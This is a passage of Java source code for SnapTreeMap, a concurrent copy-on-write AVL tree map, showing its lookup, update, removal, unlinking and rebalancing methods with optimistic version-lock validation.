this.shrinkOVL = shrinkOVL;
this.left = left;
this.right = right;
}
@Override
public K getKey() { return key; }
@Override
@SuppressWarnings("unchecked")
public V getValue() {
final Object tmp = vOpt;
if (AllowNullValues) {
return tmp == SpecialNull ? null : (V)tmp;
} else {
return (V)tmp;
}
}
@Override
public V setValue(final V v) {
throw new UnsupportedOperationException();
}
Node<K,V> child(char dir) { return dir == Left ? left : right; }
void setChild(char dir, Node<K,V> node) {
if (dir == Left) {
left = node;
} else {
right = node;
}
}
//////// copy-on-write stuff
private static <K,V> boolean isShared(final Node<K,V> node) {
return node != null && node.parent == null;
}
static <K,V> Node<K,V> markShared(final Node<K,V> node) {
if (node != null) {
node.parent = null;
}
return node;
}
private Node<K,V> lazyCopy(Node<K,V> newParent) {
assert (isShared(this));
assert (!isShrinkingOrUnlinked(shrinkOVL));
return new Node<K,V>(key, height, vOpt, newParent, 0L, markShared(left), markShared(right));
}
Node<K,V> unsharedLeft() {
final Node<K,V> cl = left;
if (!isShared(cl)) {
return cl;
} else {
lazyCopyChildren();
return left;
}
}
Node<K,V> unsharedRight() {
final Node<K,V> cr = right;
if (!isShared(cr)) {
return cr;
} else {
lazyCopyChildren();
return right;
}
}
Node<K,V> unsharedChild(final char dir) {
return dir == Left ? unsharedLeft() : unsharedRight();
}
private synchronized void lazyCopyChildren() {
final Node<K,V> cl = left;
if (isShared(cl)) {
left = cl.lazyCopy(this);
}
final Node<K,V> cr = right;
if (isShared(cr)) {
right = cr.lazyCopy(this);
}
}
//////// per-node blocking
private void waitUntilShrinkCompleted(final long ovl) {
if (!isShrinking(ovl)) {
return;
}
for (int tries = 0; tries < SpinCount; ++tries) {
if (shrinkOVL != ovl) {
return;
}
}
for (int tries = 0; tries < YieldCount; ++tries) {
Thread.yield();
if (shrinkOVL != ovl) {
return;
}
}
// spin and yield failed, use the nuclear option
synchronized (this) {
// we can't have gotten the lock unless the shrink was over
}
assert(shrinkOVL != ovl);
}
int validatedHeight() {
final int hL = left == null ? 0 : left.validatedHeight();
final int hR = right == null ? 0 : right.validatedHeight();
assert(Math.abs(hL - hR) <= 1);
final int h = 1 + Math.max(hL, hR);
assert(h == height);
return height;
}
//////// SubMap.size() helper
static <K,V> int computeFrozenSize(Node<K,V> root,
Comparable<? super K> fromCmp,
boolean fromIncl,
final Comparable<? super K> toCmp,
final boolean toIncl) {
int result = 0;
while (true) {
if (root == null) {
return result;
}
if (fromCmp != null) {
final int c = fromCmp.compareTo(root.key);
if (c > 0 || (c == 0 && !fromIncl)) {
// all matching nodes are on the right side
root = root.right;
continue;
}
}
if (toCmp != null) {
final int c = toCmp.compareTo(root.key);
if (c < 0 || (c == 0 && !toIncl)) {
// all matching nodes are on the left side
root = root.left;
continue;
}
}
// Current node matches. Nodes on left no longer need toCmp, nodes
// on right no longer need fromCmp.
if (root.vOpt != null) {
++result;
}
result += computeFrozenSize(root.left, fromCmp, fromIncl, null, false);
fromCmp = null;
root = root.right;
}
}
//////// Map.Entry stuff
@Override
public boolean equals(final Object o) {
if (!(o instanceof Map.Entry)) {
return false;
}
final Map.Entry rhs = (Map.Entry)o;
return eq(key, rhs.getKey()) && eq(getValue(), rhs.getValue());
}
private static boolean eq(final Object o1, final Object o2) {
return o1 == null ? o2 == null : o1.equals(o2);
}
@Override
public int hashCode() {
return (key == null ? 0 : key.hashCode()) ^
(getValue() == null ? 0 : getValue().hashCode());
}
@Override
public String toString() {
return key + "=" + getValue();
}
}
private static class RootHolder<K,V> extends Node<K,V> {
RootHolder() {
super(null, 1, null, null, 0L, null, null);
}
RootHolder(final RootHolder<K,V> snapshot) {
super(null, 1 + snapshot.height, null, null, 0L, null, snapshot.right);
}
}
private static class COWMgr<K,V> extends CopyOnWriteManager<RootHolder<K,V>> {
COWMgr() {
super(new RootHolder<K,V>(), 0);
}
COWMgr(final RootHolder<K,V> initialValue, final int initialSize) {
super(initialValue, initialSize);
}
protected RootHolder<K,V> freezeAndClone(final RootHolder<K,V> value) {
Node.markShared(value.right);
return new RootHolder<K,V>(value);
}
protected RootHolder<K,V> cloneFrozen(final RootHolder<K,V> frozenValue) {
return new RootHolder<K,V>(frozenValue);
}
}
//////// node access functions
private static int height(final Node<?,?> node) {
return node == null ? 0 : node.height;
}
@SuppressWarnings("unchecked")
private V decodeNull(final Object vOpt) {
assert (vOpt != SpecialRetry);
if (AllowNullValues) {
return vOpt == SpecialNull ? null : (V)vOpt;
} else {
return (V)vOpt;
}
}
private static Object encodeNull(final Object v) {
if (AllowNullValues) {
return v == null ? SpecialNull : v;
} else {
if (v == null) {
throw new NullPointerException();
}
return v;
}
}
//////////////// state
private final Comparator<? super K> comparator;
private transient volatile COWMgr<K,V> holderRef;
//////////////// public interface
public SnapTreeMap() {
this.comparator = null;
this.holderRef = new COWMgr<K,V>();
}
public SnapTreeMap(final Comparator<? super K> comparator) {
this.comparator = comparator;
this.holderRef = new COWMgr<K,V>();
}
public SnapTreeMap(final Map<? extends K, ? extends V> source) {
this.comparator = null;
this.holderRef = new COWMgr<K,V>();
putAll(source);
}
public SnapTreeMap(final SortedMap<K,? extends V> source) {
this.comparator = source.comparator();
if (source instanceof SnapTreeMap) {
final SnapTreeMap<K,V> s = (SnapTreeMap<K,V>) source;
this.holderRef = (COWMgr<K,V>) s.holderRef.clone();
}
else {
// TODO: take advantage of the sort order
// for now we optimize only by bypassing the COWMgr
int size = 0;
final RootHolder<K,V> holder = new RootHolder<K,V>();
for (Map.Entry<K,? extends V> e : source.entrySet()) {
final K k = e.getKey();
final V v = e.getValue();
if (k == null) {
throw new NullPointerException("source map contained a null key");
}
if (!AllowNullValues && v == null) {
throw new NullPointerException("source map contained a null value");
}
updateUnderRoot(k, comparable(k), UpdateAlways, null, encodeNull(v), holder);
++size;
}
this.holderRef = new COWMgr<K,V>(holder, size);
}
}
@SuppressWarnings("unchecked")
@Override
public SnapTreeMap<K,V> clone() {
final SnapTreeMap<K,V> copy;
try {
copy = (SnapTreeMap<K,V>) super.clone();
} catch (final CloneNotSupportedException xx) {
throw new InternalError();
}
assert(copy.comparator == comparator);
copy.holderRef = (COWMgr<K,V>) holderRef.clone();
return copy;
}
@Override
public int size() {
return holderRef.size();
}
@Override
public boolean isEmpty() {
// removed-but-not-unlinked nodes cannot be leaves, so if the tree is
// truly empty then the root holder has no right child
return holderRef.read().right == null;
}
@Override
public void clear() {
holderRef = new COWMgr<K,V>();
}
@Override
public Comparator<? super K> comparator() {
return comparator;
}
@Override
public boolean containsValue(final Object value) {
// apply the same null policy as the rest of the code, but fall
// back to the default implementation
encodeNull(value);
return super.containsValue(value);
}
//////// concurrent search
@Override
public boolean containsKey(final Object key) {
return getImpl(key) != null;
}
@Override
public V get(final Object key) {
return decodeNull(getImpl(key));
}
@SuppressWarnings("unchecked")
private Comparable<? super K> comparable(final Object key) {
if (key == null) {
throw new NullPointerException();
}
if (comparator == null) {
return (Comparable<? super K>)key;
}
return new Comparable<K>() {
final Comparator<? super K> _cmp = comparator;
@SuppressWarnings("unchecked")
public int compareTo(final K rhs) { return _cmp.compare((K)key, rhs); }
};
}
/** Returns either a value or SpecialNull, if present, or null, if absent. */
private Object getImpl(final Object key) {
final Comparable<? super K> k = comparable(key);
while (true) {
final Node<K,V> right = holderRef.read().right;
if (right == null) {
return null;
} else {
final int rightCmp = k.compareTo(right.key);
if (rightCmp == 0) {
// who cares how we got here
return right.vOpt;
}
final long ovl = right.shrinkOVL;
if (isShrinkingOrUnlinked(ovl)) {
right.waitUntilShrinkCompleted(ovl);
// RETRY
} else if (right == holderRef.read().right) {
// the reread of .right is the one protected by our read of ovl
final Object vo = attemptGet(k, right, (rightCmp < 0 ? Left : Right), ovl);
if (vo != SpecialRetry) {
return vo;
}
// else RETRY
}
}
}
}
private Object attemptGet(final Comparable<? super K> k,
final Node<K,V> node,
final char dirToC,
final long nodeOVL) {
while (true) {
final Node<K,V> child = node.child(dirToC);
if (child == null) {
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
// Note is not present. Read of node.child occurred while
// parent.child was valid, so we were not affected by any
// shrinks.
return null;
} else {
final int childCmp = k.compareTo(child.key);
if (childCmp == 0) {
// how we got here is irrelevant
return child.vOpt;
}
// child is non-null
final long childOVL = child.shrinkOVL;
if (isShrinkingOrUnlinked(childOVL)) {
child.waitUntilShrinkCompleted(childOVL);
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
// else RETRY
} else if (child != node.child(dirToC)) {
// this .child is the one that is protected by childOVL
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
// else RETRY
} else {
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
// At this point we know that the traversal our parent took
// to get to node is still valid. The recursive
// implementation will validate the traversal from node to
// child, so just prior to the nodeOVL validation both
// traversals were definitely okay. This means that we are
// no longer vulnerable to node shrinks, and we don't need
// to validate nodeOVL any more.
final Object vo = attemptGet(k, child, (childCmp < 0 ? Left : Right), childOVL);
if (vo != SpecialRetry) {
return vo;
}
// else RETRY
}
}
}
}
@Override
public K firstKey() {
return extremeKeyOrThrow(Left);
}
@Override
@SuppressWarnings("unchecked")
public Map.Entry<K,V> firstEntry() {
return (SimpleImmutableEntry<K,V>) extreme(false, Left);
}
@Override
public K lastKey() {
return extremeKeyOrThrow(Right);
}
@SuppressWarnings("unchecked")
public Map.Entry<K,V> lastEntry() {
return (SimpleImmutableEntry<K,V>) extreme(false, Right);
}
private K extremeKeyOrThrow(final char dir) {
final K k = (K) extreme(true, dir);
if (k == null) {
throw new NoSuchElementException();
}
return k;
}
/** Returns a key if returnKey is true, a SimpleImmutableEntry otherwise.
* Returns null if none exists.
*/
private Object extreme(final boolean returnKey, final char dir) {
while (true) {
final Node<K,V> right = holderRef.read().right;
if (right == null) {
return null;
} else {
final long ovl = right.shrinkOVL;
if (isShrinkingOrUnlinked(ovl)) {
right.waitUntilShrinkCompleted(ovl);
// RETRY
} else if (right == holderRef.read().right) {
// the reread of .right is the one protected by our read of ovl
final Object vo = attemptExtreme(returnKey, dir, right, ovl);
if (vo != SpecialRetry) {
return vo;
}
// else RETRY
}
}
}
}
private Object attemptExtreme(final boolean returnKey,
final char dir,
final Node<K,V> node,
final long nodeOVL) {
while (true) {
final Node<K,V> child = node.child(dir);
if (child == null) {
// read of the value must be protected by the OVL, because we
// must linearize against another thread that inserts a new min
// key and then changes this key's value
final Object vo = node.vOpt;
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
assert(vo != null);
return returnKey ? node.key : new SimpleImmutableEntry<K,V>(node.key, decodeNull(vo));
} else {
// child is non-null
final long childOVL = child.shrinkOVL;
if (isShrinkingOrUnlinked(childOVL)) {
child.waitUntilShrinkCompleted(childOVL);
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
// else RETRY
} else if (child != node.child(dir)) {
// this .child is the one that is protected by childOVL
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
// else RETRY
} else {
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
final Object vo = attemptExtreme(returnKey, dir, child, childOVL);
if (vo != SpecialRetry) {
return vo;
}
// else RETRY
}
}
}
}
//////////////// quiesced search
@Override
@SuppressWarnings("unchecked")
public K lowerKey(final K key) {
return (K) boundedExtreme(null, false, comparable(key), false, true, Right);
}
@Override
@SuppressWarnings("unchecked")
public K floorKey(final K key) {
return (K) boundedExtreme(null, false, comparable(key), true, true, Right);
}
@Override
@SuppressWarnings("unchecked")
public K ceilingKey(final K key) {
return (K) boundedExtreme(comparable(key), true, null, false, true, Left);
}
@Override
@SuppressWarnings("unchecked")
public K higherKey(final K key) {
return (K) boundedExtreme(comparable(key), false, null, false, true, Left);
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> lowerEntry(final K key) {
return (Entry<K,V>) boundedExtreme(null, false, comparable(key), false, false, Right);
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> floorEntry(final K key) {
return (Entry<K,V>) boundedExtreme(null, false, comparable(key), true, false, Right);
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> ceilingEntry(final K key) {
return (Entry<K,V>) boundedExtreme(comparable(key), true, null, false, false, Left);
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> higherEntry(final K key) {
return (Entry<K,V>) boundedExtreme(comparable(key), false, null, false, false, Left);
}
/** Returns null if none exists. */
@SuppressWarnings("unchecked")
private K boundedExtremeKeyOrThrow(final Comparable<? super K> minCmp,
final boolean minIncl,
final Comparable<? super K> maxCmp,
final boolean maxIncl,
final char dir) {
final K k = (K) boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, dir);
if (k == null) {
throw new NoSuchElementException();
}
return k;
}
/** Returns null if none exists. */
@SuppressWarnings("unchecked")
private Object boundedExtreme(final Comparable<? super K> minCmp,
final boolean minIncl,
final Comparable<? super K> maxCmp,
final boolean maxIncl,
final boolean returnKey,
final char dir) {
K resultKey;
Object result;
if ((dir == Left && minCmp == null) || (dir == Right && maxCmp == null)) {
// no bound in the extreme direction, so use the concurrent search
result = extreme(returnKey, dir);
if (result == null) {
return null;
}
resultKey = returnKey ? (K) result : ((SimpleImmutableEntry<K,V>) result).getKey();
}
else {
RootHolder holder = holderRef.availableFrozen();
final Epoch.Ticket ticket;
if (holder == null) {
ticket = holderRef.beginQuiescent();
holder = holderRef.read();
}
else {
ticket = null;
}
try {
final Node<K,V> node = (dir == Left)
? boundedMin(holder.right, minCmp, minIncl)
: boundedMax(holder.right, maxCmp, maxIncl);
if (node == null) {
return null;
}
resultKey = node.key;
if (returnKey) {
result = node.key;
}
else if (ticket == null) {
// node of a frozen tree is okay, copy otherwise
result = node;
}
else {
// we must copy the node
result = new SimpleImmutableEntry<K,V>(node.key, node.getValue());
}
}
finally {
if (ticket != null) {
ticket.leave(0);
}
}
}
if (dir == Left && maxCmp != null) {
final int c = maxCmp.compareTo(resultKey);
if (c < 0 || (c == 0 && !maxIncl)) {
return null;
}
}
if (dir == Right && minCmp != null) {
final int c = minCmp.compareTo(resultKey);
if (c > 0 || (c == 0 && !minIncl)) {
return null;
}
}
return result;
}
private Node<K,V> boundedMin(Node<K,V> node,
final Comparable<? super K> minCmp,
final boolean minIncl) {
while (node != null) {
final int c = minCmp.compareTo(node.key);
if (c < 0) {
// there may be a matching node on the left branch
final Node<K,V> z = boundedMin(node.left, minCmp, minIncl);
if (z != null) {
return z;
}
}
if (c < 0 || (c == 0 && minIncl)) {
// this node is a candidate, is it actually present?
if (node.vOpt != null) {
return node;
}
}
// the matching node is on the right branch if it is present
node = node.right;
}
return null;
}
private Node<K,V> boundedMax(Node<K,V> node,
final Comparable<? super K> maxCmp,
final boolean maxIncl) {
while (node != null) {
final int c = maxCmp.compareTo(node.key);
if (c > 0) {
// there may be a matching node on the right branch
final Node<K,V> z = boundedMax(node.right, maxCmp, maxIncl);
if (z != null) {
return z;
}
}
if (c > 0 || (c == 0 && maxIncl)) {
// this node is a candidate, is it actually present?
if (node.vOpt != null) {
return node;
}
}
// the matching node is on the left branch if it is present
node = node.left;
}
return null;
}
//////////////// update
private static final int UpdateAlways = 0;
private static final int UpdateIfAbsent = 1;
private static final int UpdateIfPresent = 2;
private static final int UpdateIfEq = 3;
private static boolean shouldUpdate(final int func, final Object prev, final Object expected) {
switch (func) {
case UpdateAlways: return true;
case UpdateIfAbsent: return prev == null;
case UpdateIfPresent: return prev != null;
default: { // UpdateIfEq
assert(expected != null);
if (prev == null) {
return false;
}
if (AllowNullValues && (prev == SpecialNull || expected == SpecialNull)) {
return prev == SpecialNull && expected == SpecialNull;
}
return prev.equals(expected);
}
}
}
private static Object noUpdateResult(final int func, final Object prev) {
return func == UpdateIfEq ? Boolean.FALSE : prev;
}
private static Object updateResult(final int func, final Object prev) {
return func == UpdateIfEq ? Boolean.TRUE : prev;
}
private static int sizeDelta(final int func, final Object result, final Object newValue) {
switch (func) {
case UpdateAlways: {
return (result != null ? -1 : 0) + (newValue != null ? 1 : 0);
}
case UpdateIfAbsent: {
assert(newValue != null);
return result != null ? 0 : 1;
}
case UpdateIfPresent: {
return result == null ? 0 : (newValue != null ? 0 : -1);
}
default: { // UpdateIfEq
return !((Boolean) result) ? 0 : (newValue != null ? 0 : -1);
}
}
}
@Override
public V put(final K key, final V value) {
return decodeNull(update(key, UpdateAlways, null, encodeNull(value)));
}
@Override
public V putIfAbsent(final K key, final V value) {
return decodeNull(update(key, UpdateIfAbsent, null, encodeNull(value)));
}
@Override
public V replace(final K key, final V value) {
return decodeNull(update(key, UpdateIfPresent, null, encodeNull(value)));
}
@Override
public boolean replace(final K key, final V oldValue, final V newValue) {
return (Boolean) update(key, UpdateIfEq, encodeNull(oldValue), encodeNull(newValue));
}
@Override
public V remove(final Object key) {
return decodeNull(update(key, UpdateAlways, null, null));
}
@Override
public boolean remove(final Object key, final Object value) {
if (key == null) {
throw new NullPointerException();
}
if (!AllowNullValues && value == null) {
return false;
}
return (Boolean) update(key, UpdateIfEq, encodeNull(value), null);
}
// manages the epoch
private Object update(final Object key,
final int func,
final Object expected,
final Object newValue) {
final Comparable<? super K> k = comparable(key);
int sd = 0;
final Epoch.Ticket ticket = holderRef.beginMutation();
try {
final Object result = updateUnderRoot(key, k, func, expected, newValue, holderRef.mutable());
sd = sizeDelta(func, result, newValue);
return result;
} finally {
ticket.leave(sd);
}
}
// manages updates to the root holder
@SuppressWarnings("unchecked")
private Object updateUnderRoot(final Object key,
final Comparable<? super K> k,
final int func,
final Object expected,
final Object newValue,
final RootHolder<K,V> holder) {
while (true) {
final Node<K,V> right = holder.unsharedRight();
if (right == null) {
// key is not present
if (!shouldUpdate(func, null, expected)) {
return noUpdateResult(func, null);
}
if (newValue == null || attemptInsertIntoEmpty((K)key, newValue, holder)) {
// nothing needs to be done, or we were successful, prev value is Absent
return updateResult(func, null);
}
// else RETRY
} else {
final long ovl = right.shrinkOVL;
if (isShrinkingOrUnlinked(ovl)) {
right.waitUntilShrinkCompleted(ovl);
// RETRY
} else if (right == holder.right) {
// this is the protected .right
final Object vo = attemptUpdate(key, k, func, expected, newValue, holder, right, ovl);
if (vo != SpecialRetry) {
return vo;
}
// else RETRY
}
}
}
}
private boolean attemptInsertIntoEmpty(final K key,
final Object vOpt,
final RootHolder<K,V> holder) {
synchronized (holder) {
if (holder.right == null) {
holder.right = new Node<K,V>(key, 1, vOpt, holder, 0L, null, null);
holder.height = 2;
return true;
} else {
return false;
}
}
}
/** If successful returns the non-null previous value, SpecialNull for a
* null previous value, or null if not previously in the map.
* The caller should retry if this method returns SpecialRetry.
*/
@SuppressWarnings("unchecked")
private Object attemptUpdate(final Object key,
final Comparable<? super K> k,
final int func,
final Object expected,
final Object newValue,
final Node<K,V> parent,
final Node<K,V> node,
final long nodeOVL) {
// As the search progresses there is an implicit min and max assumed for the
// branch of the tree rooted at node. A left rotation of a node x results in
// the range of keys in the right branch of x being reduced, so if we are at a
// node and we wish to traverse to one of the branches we must make sure that
// the node has not undergone a rotation since arriving from the parent.
//
// A rotation of node can't screw us up once we have traversed to node's
// child, so we don't need to build a huge transaction, just a chain of
// smaller read-only transactions.
assert (nodeOVL != UnlinkedOVL);
final int cmp = k.compareTo(node.key);
if (cmp == 0) {
return attemptNodeUpdate(func, expected, newValue, parent, node);
}
final char dirToC = cmp < 0 ? Left : Right;
while (true) {
final Node<K,V> child = node.unsharedChild(dirToC);
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
if (child == null) {
// key is not present
if (newValue == null) {
// Removal is requested. Read of node.child occurred
// while parent.child was valid, so we were not affected
// by any shrinks.
return null;
} else {
// Update will be an insert.
final boolean success;
final Node<K,V> damaged;
synchronized (node) {
// Validate that we haven't been affected by past
// rotations. We've got the lock on node, so no future
// rotations can mess with us.
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
if (node.child(dirToC) != null) {
// Lost a race with a concurrent insert. No need
// to back up to the parent, but we must RETRY in
// the outer loop of this method.
success = false;
damaged = null;
} else {
// We're valid. Does the user still want to
// perform the operation?
if (!shouldUpdate(func, null, expected)) {
return noUpdateResult(func, null);
}
// Create a new leaf
node.setChild(dirToC, new Node<K,V>((K)key, 1, newValue, node, 0L, null, null));
success = true;
// attempt to fix node.height while we've still got
// the lock
damaged = fixHeight_nl(node);
}
}
if (success) {
fixHeightAndRebalance(damaged);
return updateResult(func, null);
}
// else RETRY
}
} else {
// non-null child
final long childOVL = child.shrinkOVL;
if (isShrinkingOrUnlinked(childOVL)) {
child.waitUntilShrinkCompleted(childOVL);
// RETRY
} else if (child != node.child(dirToC)) {
// this second read is important, because it is protected
// by childOVL
// RETRY
} else {
// validate the read that our caller took to get to node
if (node.shrinkOVL != nodeOVL) {
return SpecialRetry;
}
// At this point we know that the traversal our parent took
// to get to node is still valid. The recursive
// implementation will validate the traversal from node to
// child, so just prior to the nodeOVL validation both
// traversals were definitely okay. This means that we are
// no longer vulnerable to node shrinks, and we don't need
// to validate nodeOVL any more.
final Object vo = attemptUpdate(key, k, func, expected, newValue, node, child, childOVL);
if (vo != SpecialRetry) {
return vo;
}
// else RETRY
}
}
}
}
/** parent will only be used for unlink, update can proceed even if parent
* is stale.
*/
private Object attemptNodeUpdate(final int func,
final Object expected,
final Object newValue,
final Node<K,V> parent,
final Node<K,V> node) {
if (newValue == null) {
// removal
if (node.vOpt == null) {
// This node is already removed, nothing to do.
return null;
}
}
if (newValue == null && (node.left == null || node.right == null)) {
// potential unlink, get ready by locking the parent
final Object prev;
final Node<K,V> damaged;
synchronized (parent) {
if (isUnlinked(parent.shrinkOVL) || node.parent != parent) {
return SpecialRetry;
}
synchronized (node) {
prev = node.vOpt;
if (!shouldUpdate(func, prev, expected)) {
return noUpdateResult(func, prev);
}
if (prev == null) {
return updateResult(func, prev);
}
if (!attemptUnlink_nl(parent, node)) {
return SpecialRetry;
}
}
// try to fix the parent while we've still got the lock
damaged = fixHeight_nl(parent);
}
fixHeightAndRebalance(damaged);
return updateResult(func, prev);
} else {
// potential update (including remove-without-unlink)
synchronized (node) {
// regular version changes don't bother us
if (isUnlinked(node.shrinkOVL)) {
return SpecialRetry;
}
final Object prev = node.vOpt;
if (!shouldUpdate(func, prev, expected)) {
return noUpdateResult(func, prev);
}
// retry if we now detect that unlink is possible
if (newValue == null && (node.left == null || node.right == null)) {
return SpecialRetry;
}
// update in-place
node.vOpt = newValue;
return updateResult(func, prev);
}
}
}
/** Does not adjust the size or any heights. */
private boolean attemptUnlink_nl(final Node<K,V> parent, final Node<K,V> node) {
// assert (Thread.holdsLock(parent));
// assert (Thread.holdsLock(node));
assert (!isUnlinked(parent.shrinkOVL));
final Node<K,V> parentL = parent.left;
final Node<K,V> parentR = parent.right;
if (parentL != node && parentR != node) {
// node is no longer a child of parent
return false;
}
assert (!isUnlinked(node.shrinkOVL));
assert (parent == node.parent);
final Node<K,V> left = node.unsharedLeft();
final Node<K,V> right = node.unsharedRight();
if (left != null && right != null) {
// splicing is no longer possible
return false;
}
final Node<K,V> splice = left != null ? left : right;
if (parentL == node) {
parent.left = splice;
} else {
parent.right = splice;
}
if (splice != null) {
splice.parent = parent;
}
node.shrinkOVL = UnlinkedOVL;
node.vOpt = null;
return true;
}
//////////////// NavigableMap stuff
@Override
public Map.Entry<K,V> pollFirstEntry() {
return pollExtremeEntry(Left);
}
@Override
public Map.Entry<K,V> pollLastEntry() {
return pollExtremeEntry(Right);
}
private Map.Entry<K,V> pollExtremeEntry(final char dir) {
final Epoch.Ticket ticket = holderRef.beginMutation();
int sizeDelta = 0;
try {
final Map.Entry<K,V> prev = pollExtremeEntryUnderRoot(dir, holderRef.mutable());
if (prev != null) {
sizeDelta = -1;
}
return prev;
} finally {
ticket.leave(sizeDelta);
}
}
private Map.Entry<K,V> pollExtremeEntryUnderRoot(final char dir, final RootHolder<K,V> holder) {
while (true) {
final Node<K,V> right = holder.unsharedRight();
if (right == null) {
// tree is empty, nothing to remove
return null;
} else {
final long ovl = right.shrinkOVL;
if (isShrinkingOrUnlinked(ovl)) {
right.waitUntilShrinkCompleted(ovl);
// RETRY
} else if (right == holder.right) {
// this is the protected .right
final Map.Entry<K,V> result = attemptRemoveExtreme(dir, holder, right, ovl);
if (result != SpecialRetry) {
return result;
}
// else RETRY
}
}
}
}
private Map.Entry<K,V> attemptRemoveExtreme(final char dir,
final Node<K,V> parent,
final Node<K,V> node,
final long nodeOVL) {
assert (nodeOVL != UnlinkedOVL);
while (true) {
final Node<K,V> child = node.unsharedChild(dir);
if (nodeOVL != node.shrinkOVL) {
return null;
}
if (child == null) {
// potential unlink, get ready by locking the parent
final Object vo;
final Node<K,V> damaged;
synchronized (parent) {
if (isUnlinked(parent.shrinkOVL) || node.parent != parent) {
return null;
}
synchronized (node) {
vo = node.vOpt;
if (node.child(dir) != null || !attemptUnlink_nl(parent, node)) {
return null;
}
// success!
}
// try to fix parent.height while we've still got the lock
damaged = fixHeight_nl(parent);
}
fixHeightAndRebalance(damaged);
return new SimpleImmutableEntry<K,V>(node.key, decodeNull(vo));
} else {
// keep going down
final long childOVL = child.shrinkOVL;
if (isShrinkingOrUnlinked(childOVL)) {
child.waitUntilShrinkCompleted(childOVL);
// RETRY
} else if (child != node.child(dir)) {
// this second read is important, because it is protected
// by childOVL
// RETRY
} else {
// validate the read that our caller took to get to node
if (node.shrinkOVL != nodeOVL) {
return null;
}
final Map.Entry<K,V> result = attemptRemoveExtreme(dir, node, child, childOVL);
if (result != null) {
return result;
}
// else RETRY
}
}
}
}
//////////////// tree balance and height info repair
private static final int UnlinkRequired = -1;
private static final int RebalanceRequired = -2;
private static final int NothingRequired = -3;
private int nodeCondition(final Node<K,V> node) {
// Begin atomic.
final Node<K,V> nL = node.left;
final Node<K,V> nR = node.right;
if ((nL == null || nR == null) && node.vOpt == null) {
return UnlinkRequired;
}
final int hN = node.height;
final int hL0 = height(nL);
final int hR0 = height(nR);
// End atomic. Since any thread that changes a node promises to fix
// it, either our read was consistent (and a NothingRequired conclusion
// is correct) or someone else has taken responsibility for either node
// or one of its children.
final int hNRepl = 1 + Math.max(hL0, hR0);
final int bal = hL0 - hR0;
if (bal < -1 || bal > 1) {
return RebalanceRequired;
}
return hN != hNRepl ? hNRepl : NothingRequired;
}
private void fixHeightAndRebalance(Node<K,V> node) {
while (node != null && node.parent != null) {
final int condition = nodeCondition(node);
if (condition == NothingRequired || isUnlinked(node.shrinkOVL)) {
// nothing to do, or no point in fixing this node
return;
}
if (condition != UnlinkRequired && condition != RebalanceRequired) {
synchronized (node) {
node = fixHeight_nl(node);
}
} else {
final Node<K,V> nParent = node.parent;
synchronized (nParent) {
if (!isUnlinked(nParent.shrinkOVL) && node.parent == nParent) {
synchronized (node) {
node = rebalance_nl(nParent, node);
}
}
// else RETRY
}
}
}
}
/** Attempts to fix the height of a (locked) damaged node, returning the
* lowest damaged node for which this thread is responsible. Returns null
* if no more repairs are needed.
*/
private Node<K,V> fixHeight_nl(final Node<K,V> node) {
final int c = nodeCondition(node);
switch (c) {
case RebalanceRequired:
case UnlinkRequired:
// can't repair
return node;
case NothingRequired:
// Any future damage to this node is not our responsibility.
return null;
default:
node.height = c;
// we've damaged our parent, but we can't fix it now
return node.parent;
}
}
/** nParent and n must be locked on entry. Returns a damaged node, or null
* if no more rebalancing is necessary.
*/
private Node<K,V> rebalance_nl(final Node<K,V> nParent, final Node<K,V> n) {
final Node<K,V> nL = n.unsharedLeft();
final Node<K,V> nR = n.unsharedRight();
if ((nL == null || nR == null) && n.vOpt == null) {
if (attemptUnlink_nl(nParent, n)) {
// attempt to fix nParent.height while we've still got the lock
return fixHeight_nl(nParent);
} else {
// retry needed for n
return n;
}
}
final int hN = n.height;
final int hL0 = height(nL);
final int hR0 = height(nR);
final int hNRepl = 1 + Math.max(hL0, hR0);
final int bal = hL0 - hR0;
if (bal > 1) {
return rebalanceToRight_nl(nParent, n, nL, hR0);
} else if (bal < -1) {
return rebalanceToLeft_nl(nParent, n, nR, hL0);
} else if (hNRepl != hN) {
// we've got more than enough locks to do a height change, no need to
// trigger a retry
n.height = hNRepl;
// nParent is already locked, let's try to fix it too
return fixHeight_nl(nParent);
} else {
// nothing to do
return null;
}
}
private Node<K,V> rebalanceToRight_nl(final Node<K,V> nParent,
final Node<K,V> n,
final Node<K,V> nL,
final int hR0) {
// L is too large, we will rotate-right. If L.R is taller
// than L.L, then we will first rotate-left L.
synchronized (nL) {
final int hL = nL.height;
if (hL - hR0 <= 1) {
return n; // retry
} else {
final Node<K,V> nLR = nL.unsharedRight();
final int hLL0 = height(nL.left);
final int hLR0 = height(nLR);
if (hLL0 >= hLR0) {
// rotate right based on our snapshot of hLR
return rotateRight_nl(nParent, n, nL, hR0, hLL0, nLR, hLR0);
} else {
synchronized (nLR) {
// If our hLR snapshot is incorrect then we might
// actually need to do a single rotate-right on n.
final int hLR = nLR.height;
if (hLL0 >= hLR) {
return rotateRight_nl(nParent, n, nL, hR0, hLL0, nLR, hLR);
} else {
// If the underlying left balance would not be
// sufficient to actually fix n.left, then instead
// of rolling it into a double rotation we do it on
// it's own. This may let us avoid rotating n at
// all, but more importantly it avoids the creation
// of damaged nodes that don't have a direct
// ancestry relationship. The recursive call to
// rebalanceToRight_nl in this case occurs after we
// release the lock on nLR.
//
// We also need to avoid damaging n.left if post-
// rotation it would be an unnecessary routing node.
// Note that although our height snapshots might be
// stale, their zero/non-zero state can't be.
final int hLRL = height(nLR.left);
final int b = hLL0 - hLRL;
if (b >= -1 && b <= 1 && !((hLL0 == 0 || hLRL == 0) && nL.vOpt == null)) {
// nParent.child.left won't be damaged after a double rotation
return rotateRightOverLeft_nl(nParent, n, nL, hR0, hLL0, nLR, hLRL);
}
}
}
// focus on nL, if necessary n will be balanced later
